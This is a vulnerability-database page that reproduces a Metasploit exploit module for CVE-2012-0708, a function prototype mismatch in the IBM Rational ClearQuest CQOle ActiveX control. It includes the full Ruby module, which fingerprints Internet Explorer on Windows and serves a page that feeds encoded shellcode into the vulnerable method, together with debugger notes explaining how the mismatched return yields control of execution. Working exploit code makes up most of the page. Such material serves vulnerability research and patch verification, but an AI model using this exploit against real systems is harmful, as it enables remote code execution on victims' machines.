Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

IBM Rational ClearQuest CQOle - Remote Code Execution (Metasploit)

🗓️ 05 Jul 2012 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 45 Views

IBM Rational ClearQuest CQOle - Remote Code Execution (Metasploit) This module exploits a function prototype mismatch on the CQOle ActiveX control in IBM Rational ClearQuest < 7.1.1.9, < 7.1.2.6 or < 8.0.0.2 which allows reliable remote code execution when DEP isn't enabled

Related
Code
ReporterTitlePublishedViews
Family
0day.today		IBM Rational ClearQuest CQOle Remote Code Execution
4 Jul 201200:00
zdt
IBM Security Bulletins		Security Bulletin: Rational ClearQuest CQOle ActiveX Control Remote Execution Vulnerability (CVE-2012-0708)
17 Jun 201804:36
ibm
Circl		CVE-2012-0708
5 Jul 201200:00
circl
Check Point Advisories		IBM Rational ClearQuest CQOle ActiveX Code Execution (CVE-2012-0708)
2 Jul 201200:00
checkpoint_advisories
CVE		CVE-2012-0708
22 Apr 201218:00
cve
Cvelist		CVE-2012-0708
22 Apr 201218:00
cvelist
d2		DSquare Exploit Pack: D2SEC_CLEARQUEST
22 Apr 201218:55
d2
Tenable Nessus		IBM Rational ClearQuest 7.1.1.x < 7.1.1.9 / 7.1.2.x < 7.1.2.6 / 8.0.0.x < 8.0.0.2 Multiple Vulnerabilities (credentialed check)
29 May 201200:00
nessus
Metasploit		IBM Rational ClearQuest CQOle Remote Code Execution
3 Jul 201217:03
metasploit
NVD		CVE-2012-0708
22 Apr 201218:55
nvd
Rows per page
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Remote::BrowserAutopwn
	autopwn_info({
		:ua_name    => HttpClients::IE,
		:ua_minver  => "6.0",
		:ua_maxver  => "7.0",
		:javascript => true,
		:os_name    => OperatingSystems::WINDOWS,
		:classid    => "{94773112-72E8-11D0-A42E-00A024DED613}",
		:method     => "RegisterSchemaRepoFromFileByDbSet",
		:rank       => NormalRanking
	})

	def initialize(info={})
		super(update_info(info,
			'Name'           => "IBM Rational ClearQuest CQOle Remote Code Execution",
			'Description'    => %q{
					This module exploits a function prototype mismatch on the CQOle ActiveX
				control in IBM Rational ClearQuest < 7.1.1.9, < 7.1.2.6 or < 8.0.0.2 which
				allows reliable remote code execution when DEP isn't enabled.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Andrea Micalizzi aka rgod', # Vulnerability discovery
					'juan vazquez' # Metasploit module
				],
			'References'     =>
				[
					[ 'CVE', '2012-0708' ],
					[ 'BID', '53170' ],
					[ 'OSVDB', '81443'],
					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-113/' ],
					[ 'URL', 'http://www-304.ibm.com/support/docview.wss?uid=swg21591705' ],
				],
			'Payload'        =>
				{
					'BadChars' => "\x00"
				},
			'DefaultOptions'  =>
				{
					'ExitFunction'         => "process",
					'InitialAutoRunScript' => 'migrate -f'
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# cqole.dll 7.1100.0.150
					[ 'Automatic', {} ],
					[ 'IE 6 / IE7 (No DEP)', {} ], # Because of the nature of the vulnerability no DEP is a requisite
				],
			'Privileged'     => false,
			'DisclosureDate' => "May 19 2012",
			'DefaultTarget'  => 0))
	end

	def get_target(agent)
		#If the user is already specified by the user, we'll just use that
		return target if target.name != 'Automatic'

		if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
			return targets[1]  #IE 6 on Windows XP
		elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
			return targets[1]  #IE 7 on Windows XP
		elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
			return targets[1]  #IE 7 on Windows Vista
		else
			return nil
		end
	end

	def on_request_uri(cli, request)
		agent = request.headers['User-Agent']
		my_target = get_target(agent)

		# Avoid the attack if the victim doesn't have the same setup we're targeting
		if my_target.nil?
			print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}")
			send_not_found(cli)
			return
		end

		js_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(my_target.arch))
		object_id = rand_text_alpha(rand(8) + 4)
		dbset_value = rand_text_alpha(rand(8) + 4)
		var_payload = rand_text_alpha(rand(8) + 4)

		html = <<-EOS
		<html>
		<body>
		<object id='#{object_id}' classid='clsid:94773112-72E8-11D0-A42E-00A024DED613'></object>
		<script language="JavaScript">
		var #{var_payload} = unescape("#{js_code}")
		#{object_id}.RegisterSchemaRepoFromFileByDbSet("#{dbset_value}", #{var_payload});
		</script>
		</body>
		</html>
		EOS

		html = html.gsub(/^\t\t/, '')

		print_status("#{cli.peerhost}:#{cli.peerport} - Sending html")
		send_response(cli, html, {'Content-Type'=>'text/html'})

	end

end

=begin

* RegisterSchemaRepoFromFile and no RegisterSchemaRepoFromFileByDbSet is called:

Breakpoint 0 hit
eax=3190b1a0 ebx=00000000 ecx=03015cf0 edx=7835f5d2 esi=0013e200 edi=0000000c
eip=78371062 esp=0013e204 ebp=0013e2b4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
MFC80U!_AfxDispatchCall+0xe:
78371062 ffd0            call    eax {cqole!OAdSession::RegisterSchemaRepoFromFile (3190b1a0)}

* RegisterSchemaRepoFromFile prototype (it is going to be executed):

.text:31865E40 ; protected: wchar_t * __thiscall OAdAdminSession::RegisterSchemaRepoFromFile(wchar_t const *)

his ret is: retn    4

* RegisterSchemaRepoFromFileByDbSet prototype (it should be executed):

.text:31866280 ; protected: wchar_t * __thiscall OAdAdminSession::RegisterSchemaRepoFromFileByDbSet(wchar_t const *, wchar_t const *)

his ret is: retn    8

* When RegisterSchemaRepoFromFile returns to MFC80U!_AfxDispatchCall it is what happens:

0:000> p
eax=00186864 ebx=00000000 ecx=442d618d edx=00070001 esi=0013e200 edi=0000000c
eip=78371064 esp=0013e208 ebp=0013e2b4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
MFC80U!_AfxDispatchCall+0x10:
78371064 c3              ret
0:000> dd esp
0013e208  001dcff4 7835f5d2 fffffffe 78336a3a

ESP is pointing to the second argument of RegisterSchemaRepoFromFileByDbSet and no to the stored EIP on
the stack. The ret from MFC80U!_AfxDispatchCall allows to get control on a reliable way when DEP is
disabled

=end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
05 Jul 2012 00:00Current
7High risk
Vulners AI Score7
CVSS 29.3
EPSS0.66566
ibm rational clearquestremote code executionactivexmetasploitcqolevulnerability discoverybrowserautopwninternet explorerwindowscve-2012-0708bid-53170osvdb-81443
45